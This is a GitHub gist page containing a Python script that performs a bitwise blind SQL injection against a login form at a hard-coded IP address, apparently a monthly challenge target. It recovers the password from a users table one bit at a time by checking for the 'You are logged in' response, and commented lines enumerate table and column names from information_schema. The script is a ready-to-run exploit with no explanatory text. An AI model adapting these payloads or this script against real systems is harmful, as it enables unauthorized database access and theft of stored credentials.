Skip to content

Instantly share code, notes, and snippets.

@nazywam
Created July 13, 2017 21:35
Show Gist options
  • Save nazywam/776aa3b02be3727eee1e5da78d03e111 to your computer and use it in GitHub Desktop.
Save nazywam/776aa3b02be3727eee1e5da78d03e111 to your computer and use it in GitHub Desktop.
import sys
import requests
url = "http://172.104.131.19/july2017/1.php"
def query(payload):
data = {
"login":payload,
"password":"test"
}
r = requests.post(url=url, data=data)
if(r.text.find("You are logged in") == -1):
return 1
else:
return 0
def queryLetter(payload):
b = ""
for i in range(8):
b += str(query(payload.format(str(i))))
print(b[::-1])
return (int(b[::-1], 2))
out = ""
for i in range(1, 100):
# out += chr(queryLetter("test\' or (1=(ASCII(SUBSTR((select table_name from information_schema.tables limit 1 offset 41),"+str(i)+", 1)) >> {} & 1));#"))
out += chr(queryLetter("test\' or (1=(ASCII(SUBSTR((select password from users limit 1 offset 0),"+str(i)+", 1)) >> {} & 1));#"))
# out += chr(queryLetter("test\' or (1=(ASCII(SUBSTR((select column_name from information_schema.columns where table_name = 'users' limit 1 offset 3),"+str(i)+", 1)) >> {} & 1));#"))
print(out)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment